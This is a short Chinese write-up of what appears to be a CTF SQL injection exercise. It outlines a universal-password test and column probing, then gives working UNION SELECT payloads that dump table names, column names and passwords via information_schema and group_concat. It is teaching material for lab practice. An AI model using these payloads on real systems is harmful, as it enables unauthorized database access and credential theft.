考点:常规的sql注入
1、万能密码测试
2、解不了码,没用
3、但是可以注入,测试回显几个字段名,慢慢试
4、爆数据库名和用户名
5、 爆库名
6、爆表名
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#
7、爆列名
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'#
8、爆列值
1' union select 1,2,group_concat(password) from l0ve1ysq1#
9、为什么用group_concat()
一个回显位置,只能回显一个值,如果回显多个则会报错。就像爆数据库的时候,发现有两个数据库名,如果不用group_concat()连接起来,则会报错。所以用group_concat()把两个数据库名连接成一个值进行回显。